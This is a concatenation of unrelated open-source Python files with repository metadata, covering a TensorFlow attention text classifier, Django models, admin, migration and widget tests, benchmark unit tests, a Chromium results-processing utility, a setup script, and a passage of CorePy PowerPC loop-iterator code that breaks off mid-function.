axis.set_xticklabels([])
axis.set_yticklabels([])
axis.set_xticks([])
axis.set_yticks([])
ax_count = 0
for im_set_count in range(len(images)):
for im_count in list(im_indices):
im_shape = list(images[im_set_count])[im_count].shape
axes[im_inds[ax_count]].imshow(list(images[im_set_count])[
im_count], aspect='auto',cmap='gray')
axes[im_inds[ax_count]].set_xlim((0,max(im_shape)))
axes[im_inds[ax_count]].set_ylim((0,max(im_shape)))
ax_count += 1
ax_count = 0
info = np.array(actions)
for im_count in range(len(images)):
text = ('\n').join(wrap(info[im_count],10))
axes[txt_inds[ax_count]].text(0.5*(left+right), 0.5*(bottom+top),
text,
horizontalalignment='center',
verticalalignment='center',
fontsize=9)
ax_count+=1
cellText = [['Gesture']+[str(i) for i in range(SHOWN_IMS)]]
col_table = fig_axes.table(cellText=cellText,
cellLoc='center',
loc='top')
save_fold = os.path.join(co.CONST['results_fold'],
'Classification',
'Total')
co.makedir(save_fold)
plt.savefig(os.path.join(save_fold,action_type + 'actions_vocabulary.pdf'))
construct_table('dynamic')
construct_table('passive')
|
VasLem/KinectPainting
|
construct_actions_table.py
|
Python
|
bsd-3-clause
| 8,161
|
from .assign import Assign
from .variables import *
Declare = "cx_double %(name)s ;"
Imag = "cx_double(0, %(value)s)"
|
jonathf/matlab2cpp
|
src/matlab2cpp/rules/_cx_double.py
|
Python
|
bsd-3-clause
| 119
|
from django.db import models
# Create your models here.
class FileUpload(models.Model):
title = models.CharField(max_length=128)
file = models.FileField(upload_to='uploads')
created = models.DateTimeField(auto_now_add=True)
edited = models.DateTimeField(auto_now=True)
def __unicode__(self):
return self.title
|
brendan1mcmanus/whartonfintech-v3
|
file_upload/models.py
|
Python
|
bsd-3-clause
| 326
|
from django.contrib import admin
from django.contrib.sites.models import RequestSite
from django.contrib.sites.models import Site
from django.utils.translation import ugettext_lazy as _
from .models import RegistrationProfile
class RegistrationAdmin(admin.ModelAdmin):
actions = ['activate_users', 'resend_activation_email']
list_display = ('user', 'activation_key_expired')
raw_id_fields = ['user']
search_fields = ('user__username', 'user__first_name', 'user__last_name', 'user__email')
def activate_users(self, request, queryset):
"""
Activates the selected users, if they are not alrady
activated.
"""
for profile in queryset:
RegistrationProfile.objects.activate_user(profile.activation_key)
activate_users.short_description = _("Activate users")
def resend_activation_email(self, request, queryset):
"""
Re-sends activation emails for the selected users.
Note that this will *only* send activation emails for users
who are eligible to activate; emails will not be sent to users
whose activation keys have expired or who have already
activated.
"""
if Site._meta.installed:
site = Site.objects.get_current()
else:
site = RequestSite(request)
for profile in queryset:
if not profile.activation_key_expired():
profile.send_activation_email(site)
resend_activation_email.short_description = _("Re-send activation emails")
admin.site.register(RegistrationProfile, RegistrationAdmin)
|
husarion/django-registration
|
registration/admin.py
|
Python
|
bsd-3-clause
| 1,611
|
import tensorflow as tf
from global_module.settings_module import set_params, set_dir
class DeepAttentionClassifier:
def __init__(self, params, dir_obj):
self.params = params
self.dir_obj = dir_obj
self.call_pipeline()
def call_pipeline(self):
self.create_network_pipeline()
def create_network_pipeline(self):
self.create_placeholders()
self.create_rnn_cell()
self.embedding_layer_lookup()
self.run_rnn()
if self.params.use_attention:
self.apply_attention()
self.compute_cost()
if self.params.mode == 'TR':
self.train()
def create_placeholders(self):
with tf.variable_scope('emb_var'):
self.word_emb_matrix = tf.get_variable("word_embedding_matrix", shape=[self.params.vocab_size, self.params.EMB_DIM], dtype=tf.float32)
with tf.variable_scope('placeholders'):
self.word_input = tf.placeholder(name="word_input", shape=[self.params.batch_size, self.params.MAX_SEQ_LEN], dtype=tf.int32)
self.seq_length = tf.placeholder(name="seq_len", shape=[self.params.batch_size], dtype=tf.int32)
self.label = tf.placeholder(name="labels", shape=[self.params.batch_size], dtype=tf.int32)
def create_rnn_cell(self):
if self.params.rnn_cell == 'lstm':
self.rnn_cell = tf.nn.rnn_cell.MultiRNNCell([self.get_lstm_cell() for _ in range(self.params.NUM_LAYER)])
else:
self.rnn_cell = tf.nn.rnn_cell.MultiRNNCell([self.get_gru_cell() for _ in range(self.params.NUM_LAYER)])
def get_gru_cell(self):
with tf.variable_scope('gru_cell'):
rnn_cell = tf.contrib.rnn.GRUCell(num_units=self.params.RNN_HIDDEN_DIM)
rnn_cell = tf.contrib.rnn.DropoutWrapper(rnn_cell, input_keep_prob=self.params.keep_prob, output_keep_prob=self.params.keep_prob)
return rnn_cell
def get_lstm_cell(self):
with tf.variable_scope('lstm_cell'):
rnn_cell = tf.contrib.rnn.BasicLSTMCell(num_units=self.params.RNN_HIDDEN_DIM, forget_bias=1.0)
rnn_cell = tf.contrib.rnn.DropoutWrapper(rnn_cell, input_keep_prob=self.params.keep_prob, output_keep_prob=self.params.keep_prob)
return rnn_cell
def embedding_layer_lookup(self):
with tf.variable_scope('lookup'):
self.word_emb_feature = tf.nn.embedding_lookup(self.word_emb_matrix,
self.word_input,
name='word_emb_feature',
validate_indices=True)
def run_rnn(self):
with tf.variable_scope('rnn_block'):
if not self.params.bidirectional:
self.rnn_outputs, self.rnn_state = tf.nn.dynamic_rnn(cell=self.rnn_cell,
inputs=self.word_emb_feature,
sequence_length=self.seq_length,
dtype=tf.float32)
if self.params.rnn_cell == 'lstm':
self.rnn_state = self.rnn_state[self.params.NUM_LAYER-1][1]
else:
((fw_outputs, bw_outputs), (fw_state, bw_state)) = tf.nn.bidirectional_dynamic_rnn(cell_fw=self.rnn_cell,
cell_bw=self.rnn_cell,
inputs=self.word_emb_feature,
sequence_length=self.seq_length,
dtype=tf.float32)
self.rnn_outputs = tf.concat(values=(fw_outputs, bw_outputs), axis=2, name='concat_output')
if self.params.rnn_cell == 'lstm':
self.rnn_state = tf.concat(values=(fw_state[self.params.NUM_LAYER-1][1], bw_state[self.params.NUM_LAYER-1][1]), axis=1, name='concat_state')
# self.rnn_state = fw_state[1] + bw_state[1]
elif self.params.rnn_cell == 'gru':
self.rnn_state = tf.concat(values=(fw_state[self.params.NUM_LAYER-1], bw_state[self.params.NUM_LAYER-1]), axis=1, name='concat_state')
# self.rnn_state = fw_state + bw_state
def apply_attention(self):
with tf.variable_scope('attention'):
attention_vector = tf.get_variable(name='attention_vector',
shape=[self.params.ATTENTION_DIM],
dtype=tf.float32)
mlp_layer_projection = tf.layers.dense(inputs=self.rnn_outputs,
units=self.params.ATTENTION_DIM,
activation=tf.nn.tanh,
kernel_initializer=tf.contrib.layers.xavier_initializer(),
name='fc_attn')
attended_vector = tf.tensordot(mlp_layer_projection, attention_vector, axes=[[2], [0]])
attention_weights = tf.expand_dims(tf.nn.softmax(attended_vector), -1)
weighted_input = tf.matmul(self.rnn_outputs, attention_weights, transpose_a=True)
self.attention_output = tf.squeeze(weighted_input, axis=2)
def compute_cost(self):
with tf.variable_scope('dense_layers'):
with tf.variable_scope('dropout'):
if self.params.use_attention:
sentence_vector = tf.nn.dropout(self.attention_output, keep_prob=self.params.keep_prob, name='attention_vector_dropout')
else:
sentence_vector = tf.nn.dropout(self.rnn_state, keep_prob=self.params.keep_prob, name='rnn_state_dropout')
output1 = tf.layers.dense(inputs=sentence_vector,
units=self.params.num_classes,
activation=tf.nn.tanh,
kernel_initializer=tf.random_uniform_initializer(minval=-0.1, maxval=0.1),
bias_initializer=tf.constant_initializer(0.01),
name='fc_1')
with tf.variable_scope('last_layer'):
self.logits = tf.layers.dense(inputs=output1,
units=self.params.num_classes,
kernel_initializer=tf.contrib.layers.xavier_initializer(),
bias_initializer=tf.constant_initializer(0.01),
name='fc_logit')
with tf.name_scope('pred_acc'):
with tf.name_scope('prediction'):
self.probabilities = tf.nn.softmax(self.logits, name='softmax_probability')
self.prediction = tf.cast(tf.argmax(input=self.probabilities, axis=1, name='prediction'), dtype=tf.int32)
correct_prediction = tf.equal(self.prediction, self.label)
with tf.name_scope('accuracy'):
self.accuracy = tf.reduce_mean(tf.cast(correct_prediction, tf.float32))
with tf.variable_scope('loss'):
with tf.variable_scope('softmax_loss'):
gold_labels = tf.one_hot(indices=self.label, depth=self.params.num_classes, name='gold_label')
softmax_loss = tf.reduce_sum(tf.nn.softmax_cross_entropy_with_logits(labels=gold_labels, logits=self.logits), name='softmax_loss')
with tf.variable_scope('reg_loss'):
if self.params.mode == 'TR':
tvars = tf.trainable_variables()
l2_regularizer = tf.contrib.layers.l2_regularizer(scale=self.params.REG_CONSTANT, scope=None)
regularization_penalty = tf.contrib.layers.apply_regularization(l2_regularizer, tvars)
if self.params.is_word_trainable:
reg_penalty_word_emb = tf.contrib.layers.apply_regularization(l2_regularizer, [self.word_emb_matrix])
else:
reg_penalty_word_emb = 0
reg_loss = regularization_penalty - reg_penalty_word_emb
else:
reg_loss = 0
self.loss = softmax_loss + reg_loss
if self.params.mode == 'TR' and self.params.log:
self.train_loss = tf.summary.scalar('loss_train', self.loss)
self.train_accuracy = tf.summary.scalar('acc_train', self.accuracy)
elif self.params.mode == 'VA' and self.params.log:
valid_loss = tf.summary.scalar('loss_valid', self.loss)
valid_accuracy = tf.summary.scalar('acc_valid', self.accuracy)
self.merged_else = tf.summary.merge([valid_loss, valid_accuracy])
else:
self.merged_else = []
print('Loss Computation: DONE')
def train(self):
with tf.variable_scope('train'):
self._lr = tf.Variable(0.0, trainable=False, name='learning_rate')
with tf.variable_scope('optimize'):
tvars = tf.trainable_variables()
grads = tf.gradients(self.loss, tvars)
grads, _ = tf.clip_by_global_norm(grads, clip_norm=self.params.max_grad_norm)
grad_var_pairs = zip(grads, tvars)
optimizer = tf.train.GradientDescentOptimizer(self.lr, name='sgd')
self._train_op = optimizer.apply_gradients(grad_var_pairs, name='apply_grad')
# optimizer = tf.train.AdamOptimizer(learning_rate=1e-2, name='optimizer')
# optimizer = tf.train.AdadeltaOptimizer(learning_rate=self._lr, epsilon=1e-6, name='optimizer')
# self._train_op = optimizer.apply_gradients(zip(self.grads, tvars), name='apply_grad')
if self.params.log:
grad_summaries = []
for grad, var in grad_var_pairs:
if grad is not None:
grad_hist_summary = tf.summary.histogram("{}/grad/hist".format(var.name), grad)
sparsity_summary = tf.summary.scalar("{}/grad/sparsity".format(var.name), tf.nn.zero_fraction(grad))
grad_summaries.append(grad_hist_summary)
grad_summaries.append(sparsity_summary)
grad_summaries_merged = tf.summary.merge(grad_summaries)
self.merged_train = tf.summary.merge([self.train_loss, self.train_accuracy, grad_summaries_merged])
else:
self.merged_train = []
def assign_lr(self, session, lr_value):
session.run(tf.assign(self.lr, lr_value))
@property
def lr(self):
return self._lr
@property
def train_op(self):
return self._train_op
def main():
params = set_params.ParamsClass(mode='TR')
dir_obj = set_dir.Directory('TR')
classifier_obj = DeepAttentionClassifier(params, dir_obj)
if __name__ == '__main__':
main()
|
krayush07/deep-attention-text-classifier-tf
|
global_module/implementation_module/model.py
|
Python
|
bsd-3-clause
| 11,389
|
'''
Copyright (c) 2011, Joseph LaFata
All rights reserved.
Redistribution and use in source and binary forms, with or without
modification, are permitted provided that the following conditions are met:
* Redistributions of source code must retain the above copyright
notice, this list of conditions and the following disclaimer.
* Redistributions in binary form must reproduce the above copyright
notice, this list of conditions and the following disclaimer in the
documentation and/or other materials provided with the distribution.
* Neither the name of the unitbench nor the
names of its contributors may be used to endorse or promote products
derived from this software without specific prior written permission.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY
DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
(INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
(INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
'''
import sys
from nose.tools import assert_almost_equals, eq_
from unitbench import TimeSet, Benchmark, BenchResult, Reporter, CsvReporter
from unittest import TestCase
if sys.version_info < (3, 0):
from StringIO import StringIO
else:
from io import StringIO
class NullReporter(Reporter):
pass
class OneRun(Benchmark):
def warmup(self):
return 0
def repeats(self):
return 1
class TestBenchResult(TestCase):
def test_stats(self):
times = []
times.append(TimeSet(3, 1, 0))
times.append(TimeSet(4, 2, 0))
times.append(TimeSet(4, 4, 0))
times.append(TimeSet(5, 5, 0))
times.append(TimeSet(6, 7, 0))
times.append(TimeSet(8, 11, 0))
results = BenchResult("bench_sample1", 10, times)
eq_(results.name, "bench_sample1")
assert results.value == "10"
assert results.wall_min == 3
assert results.wall_max == 8
assert results.wall_mean == 5
assert_almost_equals(results.wall_variance, 2.67, places=2)
assert_almost_equals(results.wall_stddev, 1.63, places=2)
assert results.user_min == 1
assert results.user_max == 11
assert results.user_mean == 5
assert results.user_variance == 11.0
assert_almost_equals(results.user_stddev, 3.32, places=2)
class TestBenchmark(TestCase):
def test_warmup(self):
class sample(Benchmark):
def __init__(self):
self.count = 0
self.count2 = 0
def warmup(self):
return 4
def repeats(self):
return 0
def bench_count(self):
self.count += 1
def bench_count2(self, input):
self.count2 += 1
bm = sample()
bm.run(NullReporter())
assert bm.count == 4
assert bm.count2 == 4
def test_teardown(self):
""" teardown should be called regardless of errors
"""
class sample(Benchmark):
def __init__(self):
self.setup_count = 0
def setup(self):
self.setup_count += 1
if self.setup_count > 1:
raise ValueError
def teardown(self):
self.setup_count -= 1
if self.setup_count < 0:
raise ValueError
def bench_exception(self, input):
1/0
def bench_works(self):
pass
bm = sample()
self.assertRaises(ZeroDivisionError, bm.run)
assert bm.setup_count == 0
def test_input(self):
class SampleBase(OneRun):
def __init__(self):
self.passed_in = []
def bench_sample(self, input):
self.passed_in.append(input)
class InputGen(SampleBase):
def input(self):
i = 10
while i < 1000:
yield i
i *= 10
class InputList(SampleBase):
def input(self):
return [10, 100, 1000, 20]
bm = InputGen()
bm.run(NullReporter())
assert bm.passed_in == [10, 100]
bm = InputList()
bm.run(NullReporter())
assert bm.passed_in == [10, 100, 1000, 20]
def test_param_count(self):
class sample(OneRun):
def bench_no_params(self):
self.no_param = True
def bench_one_param(self, input):
self.one_param = True
bm = sample()
bm.run(NullReporter())
assert bm.no_param
assert bm.one_param
def test_findbenchmarks(self):
class sample(Benchmark):
def benchSample1(self, input):
pass
def bench_Sample2(self, input):
pass
def sampleBench3(self, input):
pass
def bench_sample4(self):
pass
bms = sample()._find_benchmarks()
assert "benchSample1" in bms
assert "bench_Sample2" in bms
assert not "sampleBench3" in bms
assert "bench_sample4" in bms
def test_function_name_to_title(self):
bm = OneRun()
eq_(bm._function_name_to_title("bench_sample1_sample2"), "Sample1 Sample2")
eq_(bm._function_name_to_title("benchSample1Sample2"), "Sample1 Sample2")
eq_(bm._function_name_to_title("sample1_sample2"), "Sample1 Sample2")
eq_(bm._function_name_to_title("Sample1Sample2"), "Sample1 Sample2")
eq_(bm._function_name_to_title("_sample1_sample2_"), "Sample1 Sample2")
eq_(bm._function_name_to_title("XMLBenchmark"), "Xml Benchmark")
class TestCsvReporter(TestCase):
def test_write_titles(self):
class sample(OneRun):
def warmup(self):
return 0
def repeats(self):
return 0
def bench_sample1(self):
self.no_param = True
def bench_sample2(self, input):
self.one_param = True
bm = sample()
stream = StringIO()
bm.run(CsvReporter(stream))
output = stream.getvalue()
stream.close()
eq_("Values,Sample1,Sample2\n", output)
|
OldhamMade/unitbench
|
tests/test_unitbench.py
|
Python
|
bsd-3-clause
| 7,579
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('login', '0011_auto_20160526_0738'),
]
operations = [
migrations.AlterField(
model_name='userprofile',
name='designation',
field=models.CharField(default=b'Student', max_length=10, choices=[(b'Teacher', b'Teacher'), (b'Student', b'Student')]),
),
]
|
BuildmLearn/University-Campus-Portal-UCP
|
UCP/login/migrations/0012_auto_20160529_0607.py
|
Python
|
bsd-3-clause
| 492
|
# Copyright 2019 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import calendar
import datetime
import logging
import multiprocessing
from multiprocessing.dummy import Pool as ThreadPool
TELEMETRY_TEST_PATH_FORMAT = 'telemetry'
GTEST_TEST_PATH_FORMAT = 'gtest'
def ApplyInParallel(function, work_list, on_failure=None):
"""Apply a function to all values in work_list in parallel.
Args:
function: A function with one argument.
work_list: Any iterable with arguments for the function.
on_failure: A function to run in case of a failure.
"""
if not work_list:
return
try:
# Note that this is speculatively halved as an attempt to fix
# crbug.com/953365.
cpu_count = multiprocessing.cpu_count() / 2
except NotImplementedError:
# Some platforms can raise a NotImplementedError from cpu_count()
logging.warning('cpu_count() not implemented.')
cpu_count = 4
pool = ThreadPool(min(cpu_count, len(work_list)))
def function_with_try(arg):
try:
function(arg)
except Exception: # pylint: disable=broad-except
# logging exception here is the only way to get a stack trace since
# multiprocessing's pool implementation does not save that data. See
# crbug.com/953365.
logging.exception('Exception while running %s' % function.__name__)
if on_failure:
on_failure(arg)
try:
pool.imap_unordered(function_with_try, work_list)
pool.close()
pool.join()
finally:
pool.terminate()
def SplitTestPath(test_result, test_path_format):
""" Split a test path into test suite name and test case name.
Telemetry and Gtest have slightly different test path formats.
Telemetry uses '{benchmark_name}/{story_name}', e.g.
'system_health.common_desktop/load:news:cnn:2018'.
Gtest uses '{test_suite_name}.{test_case_name}', e.g.
'ZeroToFiveSequence/LuciTestResultParameterizedTest.Variant'
"""
if test_path_format == TELEMETRY_TEST_PATH_FORMAT:
separator = '/'
elif test_path_format == GTEST_TEST_PATH_FORMAT:
separator = '.'
else:
raise ValueError('Unknown test path format: %s' % test_path_format)
test_path = test_result['testPath']
if separator not in test_path:
raise ValueError('Invalid test path: %s' % test_path)
return test_path.split(separator, 1)
def IsoTimestampToEpoch(timestamp):
"""Convert ISO formatted time to seconds since epoch."""
try:
dt = datetime.datetime.strptime(timestamp, '%Y-%m-%dT%H:%M:%S.%fZ')
except ValueError:
dt = datetime.datetime.strptime(timestamp, '%Y-%m-%dT%H:%M:%SZ')
return calendar.timegm(dt.timetuple()) + dt.microsecond / 1e6
def SetUnexpectedFailure(test_result):
"""Update fields of a test result in a case of processing failure."""
test_result['status'] = 'FAIL'
test_result['expected'] = False
logging.error('Processing failed for test %s', test_result['testPath'])
|
endlessm/chromium-browser
|
tools/perf/core/results_processor/util.py
|
Python
|
bsd-3-clause
| 2,989
|
import json
from django import forms
from django.test.utils import override_settings
from django_webtest import WebTest
from . import build_test_urls
class FileInputForm(forms.Form):
test_field = forms.FileField()
data_field = forms.BooleanField(required=False, widget=forms.HiddenInput,
help_text='To produce non empty POST for empty test_field')
@override_settings(ROOT_URLCONF=__name__)
class Test(WebTest):
default_form = FileInputForm
def test_default_usecase(self):
page = self.app.get(self.test_default_usecase.url)
self.assertIn('id="id_test_field_container"', page.body.decode('utf-8'))
self.assertIn('id="id_test_field"', page.body.decode('utf-8'))
form = page.form
self.assertIn('test_field', form.fields)
response = form.submit(upload_files=[('test_field', __file__)])
response = json.loads(response.body.decode('utf-8'))
self.assertIn('cleaned_data', response)
self.assertIn('test_field', response['cleaned_data'])
self.assertEquals('InMemoryUploadedFile', response['cleaned_data']['test_field'])
def test_invalid_value(self):
form = self.app.get(self.test_invalid_value.url).form
form['data_field'] = '1'
response = form.submit()
self.assertIn('This field is required.', response.body.decode('utf-8'))
def test_part_group_class(self):
page = self.app.get(self.test_part_group_class.url)
self.assertIn('class="input-field file-field col s12 required yellow"', page.body.decode('utf-8'))
test_part_group_class.template = '''
{% form %}
{% part form.test_field group_class %}input-field file-field col s12 required yellow{% endpart %}
{% endform %}
'''
def test_part_add_group_class(self):
page = self.app.get(self.test_part_add_group_class.url)
self.assertIn('class="input-field file-field col s12 required deep-purple lighten-5"', page.body.decode('utf-8'))
test_part_add_group_class.template = '''
{% form %}
{% part form.test_field add_group_class %}deep-purple lighten-5{% endpart %}
{% endform %}
'''
def test_part_prefix(self):
response = self.app.get(self.test_part_prefix.url)
self.assertIn('<span>DATA</span>', response.body.decode('utf-8'))
test_part_prefix.template = '''
{% form %}
{% part form.test_field prefix %}<span>DATA</span>{% endpart %}
{% endform %}
'''
def test_part_add_control_class(self):
response = self.app.get(self.test_part_add_control_class.url)
self.assertIn('class="file-path orange"', response.body.decode('utf-8'))
test_part_add_control_class.template = '''
{% form %}
{% part form.test_field add_control_class %}orange{% endpart %}
{% endform %}
'''
def test_part_label(self):
response = self.app.get(self.test_part_label.url)
self.assertIn('<label for="id_test_field">My label</label>', response.body.decode('utf-8'))
test_part_label.template = '''
{% form %}
{% part form.test_field label %}<label for="id_test_field">My label</label>{% endpart %}
{% endform %}
'''
def test_part_help_text(self):
response = self.app.get(self.test_part_help_text.url)
self.assertIn('<small class="help-block">My help</small>', response.body.decode('utf-8'))
test_part_help_text.template = '''
{% form %}
{% part form.test_field help_text %}<small class="help-block">My help</small>{% endpart %}
{% endform %}
'''
def test_part_errors(self):
response = self.app.get(self.test_part_errors.url)
self.assertIn('<div class="errors"><small class="error">My Error</small></div>', response.body.decode('utf-8'))
test_part_errors.template = '''
{% form %}
{% part form.test_field errors%}<div class="errors"><small class="error">My Error</small></div>{% endpart %}
{% endform %}
'''
urlpatterns = build_test_urls(Test)
|
2947721120/django-material
|
tests/test_widget_fileinput.py
|
Python
|
bsd-3-clause
| 4,140
|
import os
from setuptools import setup, find_packages
CURRENT_DIR = os.path.dirname(__file__)
def read(fname):
return open(os.path.join(CURRENT_DIR, fname)).read()
# Info for setup
PACKAGE = 'reddit_view'
NAME = 'reddit_view'
DESCRIPTION = 'a reddit image collector'
AUTHOR = 'Jorge Perez'
AUTHOR_EMAIL = 'japrogramer@gmail.com'
URL = 'https://github.com/japrogramer/reddit_view'
VERSION = __import__(PACKAGE).__version__
# setup call
setup(
name=NAME,
version=VERSION,
description=DESCRIPTION,
long_description=read('README.rst'),
author=AUTHOR,
author_email=AUTHOR_EMAIL,
license='BSD',
url=URL,
packages=find_packages(exclude=["tests.*", "tests"]),
include_package_data=True,
classifiers=[
'Development Status :: 5 - Production/Stable',
'Environment :: Web Environment',
'Intended Audience :: Developers',
'License :: OSI Approved :: BSD License',
'Operating System :: OS Independent',
'Programming Language :: Python',
],
keywords = 'reddit images imgur links list subreddits',
install_requires=[
'requests',
'beautifulsoup4',
'fake-useragent',
],
zip_safe=False,
entry_points={
'console_scripts': ['reddit_view=reddit_view.__main__:main',],},
)
|
japrogramer/reddit_view
|
setup.py
|
Python
|
bsd-3-clause
| 1,317
|
# Copyright (c) 2006-2009 The Trustees of Indiana University.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# - Redistributions of source code must retain the above copyright notice, this
# list of conditions and the following disclaimer.
#
# - Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
#
# - Neither the Indiana University nor the names of its contributors may be used
# to endorse or promote products derived from this software without specific
# prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE
# FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
# DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
# SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
# OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
# Iterator Hierarchy
import array
import random
# import Numeric
import corepy.lib.extarray as extarray
import corepy.arch.ppc.platform as synppc
import corepy.arch.ppc.isa as ppc
import corepy.arch.vmx.isa as vmx
import corepy.arch.ppc.types.ppc_types as vars
import corepy.arch.vmx.types.vmx_types as vmx_vars
import corepy.arch.ppc.lib.util as util
# import synnumeric
# import synbuffer
# import metavar
# import metavec
class _numeric_type: pass
def _typecode(a):
if type(a) in (_array_type, _extarray_type):
return a.typecode
elif type(a) is _numeric_type:
return a.typecode()
elif type(a) is memory_desc:
return a.typecode
else:
raise Exception('Unknown array type ' + type(a))
def _array_address(a):
if type(a) in (_array_type, _extarray_type):
return a.buffer_info()[0]
elif type(a) is _numeric_type:
return synnumeric.array_address(a)
elif type(a) is memory_desc:
return a.addr
else:
raise Exception('Unknown array type ' + type(a))
class ParallelInstructionStream(synppc.InstructionStream):
def __init__(self):
synppc.InstructionStream.__init__(self)
self.r_rank = self.acquire_register()
self.r_size = self.acquire_register()
return
def release_parallel_registers(self):
self.release_register(self.r_rank)
self.release_register(self.r_size)
return
def _save_registers(self):
"""
Add the parameter loading instructions to the prologue.
"""
synppc.InstructionStream._save_registers(self)
# Rank and Size are the only two parameters to the function. Note
# that the ABI conventions appear to be off by one word. r1
# contains the stack pointer.
# self._prologue.add(ppc.lwz(self.r_rank, 1, 24)) # param 1 should be + 24
# self._prologue.add(ppc.lwz(self.r_size, 1, 28)) # param 2 should be + 28
# Register parameter values
raise Exception('Fix this')
self._prologue.add(ppc.addi(self.r_rank, 3, 0))
self._prologue.add(ppc.addi(self.r_size, 4, 0))
return
# _numeric_type = type(Numeric.array(1))
_array_type = type(array.array('I', [1]))
_extarray_type = type(extarray.extarray('I', [1]))
CTR = 0
DEC = 1
INC = 2
class syn_iter(object):
def __init__(self, code, count, step = 1, mode = INC):
self.code = code
self.mode = mode
self.state = 0
self.n = count
self.step = step
self.r_count = None
self.r_stop = None
# Hack to allow the caller to supply the stop register
self.external_stop = False
self.current_count = None
self.start_label = None
return
def set_external_stop(self, r):
self.r_stop = r
self.external_stop = True
return
def get_start(self):
"""
Used in INC mode to start the count from somewhere other than
zero. Has no effect on CTR or DEC modes.
"""
return 0
def get_count(self):
return self.n
def n_steps(self):
return self.n / self.step
def step_size(self):
return self.step
def start(self, align = True, branch = True):
if self.r_count is None:
self.r_count = self.code.prgm.acquire_register()
if self.mode == CTR and branch:
if self.step_size() != 1:
raise Exception('CTR loops must have step_size of 1, you used ' + str(self.step_size()))
if self.external_stop:
self.code.add(ppc.mtctr(self.r_stop))
else:
util.load_word(self.code, self.r_count, self.n_steps())
self.code.add(ppc.mtctr(self.r_count))
self.code.prgm.release_register(self.r_count)
self.r_count = None
elif self.mode == DEC:
util.load_word(self.code, self.r_count, self.get_count())
elif self.mode == INC:
if self.r_stop is None and branch:
self.r_stop = self.code.prgm.acquire_register()
util.load_word(self.code, self.r_count, self.get_start())
if branch and not self.external_stop:
util.load_word(self.code, self.r_stop, self.get_count())
# /end mode if
if self.r_count is not None:
self.current_count = vars.UnsignedWord(code = self.code, reg = self.r_count)
if align and branch:
# Align the start of the loop on a 16 byte boundary
while (self.code.size()) % 4 != 0:
self.code.add(ppc.noop())
# Label
self.start_label = self.code.prgm.get_unique_label("SYN_ITER_START")
self.code.add(self.start_label)
return
def setup(self):
return
def get_current(self):
return self.current_count
def cleanup(self):
# Update the current count
if self.mode == DEC:
# Note: using addic here may cause problems with zip/nested loops...tread with caution!
self.code.add(ppc.addic_(self.r_count, self.r_count, -self.step_size()))
elif self.mode == INC:
self.code.add(ppc.addi(self.r_count, self.r_count, self.step_size()))
return
def end(self, branch = True):
if self.mode == CTR and branch:
self.code.add(ppc.bdnz(self.start_label))
elif self.mode == DEC:
# branch if r_count is not zero (CR)
# Note that this relies on someone (e.g. cleanup()) setting the
# condition register properly.
if branch:
self.code.add(ppc.bgt(self.start_label))
# Reset the counter in case this is a nested loop
util.load_word(self.code, self.r_count, self.get_count())
elif self.mode == INC:
# branch if r_current < r_stop
if branch:
self.code.add(ppc.cmpw(0, self.r_count, self.r_stop))
#self.code.add(ppc.cmp_(0, 2, self.r_count, self.r_stop))
self.code.add(ppc.blt(self.start_label))
# Reset the the current value in case this is a nested loop
util.load_word(self.code, self.r_count, self.get_start())
if self.r_count is not None:
self.code.prgm.release_register(self.r_count)
self.r_count = None
if self.r_stop is not None and not self.external_stop:
self.code.prgm.release_register(self.r_stop)
self.r_count = None
return
def __iter__(self):
self.state = 0
self.start()
return self
def next(self):
if self.state == 0:
self.state = 1
self.setup()
return self.get_current()
else:
self.cleanup()
self.end()
raise StopIteration
return
class parallel(object):
def __init__(self, obj):
object.__init__(self)
self.obj = obj
if type(self.obj) is zip_iter:
self.obj.iters = [parallel(i) for i in self.obj.iters]
self.state = 0
return
def get_start(self): return self.obj.get_start()
def get_count(self): return self.obj.get_count()
def n_steps(self): return self.obj.n_steps()
def step_size(self): return self.obj.step_size()
def setup(self): return self.obj.setup()
def get_current(self): return self.obj.get_current()
def cleanup(self): return self.obj.cleanup()
def end(self, branch = True): return self.obj.end(branch)
def _update_inc_count(self):
code = self.obj.code
r_block_size = code.prgm.acquire_register()
r_offset = code.prgm.acquire_register()
